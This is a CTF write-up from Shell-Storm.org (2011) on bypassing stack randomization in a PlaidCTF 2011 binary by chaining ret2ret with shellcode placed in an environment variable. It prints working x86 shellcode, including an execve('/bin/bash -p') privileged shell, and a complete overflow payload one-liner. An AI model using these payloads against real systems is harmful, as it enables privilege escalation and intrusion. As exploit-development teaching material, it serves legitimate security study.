|
Shell-Storm.org is a development organization based on GNU/Linux systems
that provide free projects and source codes.
Shell-storm.org provides useful information to people who perform security testing.
Title: Easy way to bypass randomization by chaining ret2ret and ENVAR (without NX)
Language: English
Author: Florian Gaultier (agix) (twitter)
Date 2011-04-28
Back
Randomization makes buffer overflow exploitation harder because we can't guess our shellcode adresse,
it changes with every execution. A well known technique consist in brute forcing an address and pray
to fall into a really big nop sled (may be 60K) that redirects execution into our dear shellcode :)
For instance, we take Another Small Bug from PlaidCTF 2k11 (an impressive ctf I want to insist :D !
It was really fun).
You can check the brute forcing method here http://howto.shell-storm.org/files/howto-9.php
But let's try to sploit it without brute forcing.
I pass on the way to find vuln, Jonathan explains it very well, so I start off when he overflows the SEIP :
Now, I will write my shellcode without nop in an environment variable (I choose this
execve('/bin/bash',['/bin/bash','-p'],0) http://www.shell-storm.org/shellcode/files/shellcode-606.php)
export hack=$(perl -e 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61 \
\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"')
Notice the variable name, it's important.
So, when the program segfaults, I will check the stack :
The adresses I framed are leading to the environnement variables, I have to find where is my hack variable :
0xbf952aa1 that's right. Now look if I reexecute the same payload :
For each execution, my hack adress is at the same place !
Just count how many words there are between $esp and my hack adress.
31 + 0x65646362 where the first ret return.
Now I just have to ret at my main ret 32 times.
It will unstack until 'hack' adress, but it will also overwrite the 'hack' adress with the \x00 end of strings !
Don't worry, just put a pop ret adress before it. I found it in puts func.
So my payload will be :perl -e 'print "a"x532 . "\x2f\x82\x04\x08"x30 . "\xf9\x88\x04\x08"' | ./exploitme 999999
As Jonathan said, "j'avais des problèmes à ouvrir un simple shell..." The same thing happened to me.
Just try another shellcode for the POC : execve('/usr/bin/id',0,0) :
export hack=$(perl -e 'print "\x6a\x0b\x58\xeb\x07\x5b\x31\xc9\x31\xd2\xcd\x80\xe8\xf4\xff\xff\xff/usr/bin/id"')
the payload won't change.
No brute force, it's easy !
Do you remember I said about taking care of the name of environnment variable : 'hack' ?
As you can see, 'hack=' is ASM for push 0x3d6b6361 so there is no bug with 'hack' ! You can use any name if
<name>= is neutral ASM instruction !
Last thing, number of ret can change of 1 between gdb and 'reality'. It depends on where your envvar adress
is in the stack. Because gdb has its own varenv
So stop maltreating memory with brute forcing and infinite nop sled ! You can continue to jump into your
shellcode softly :D
|
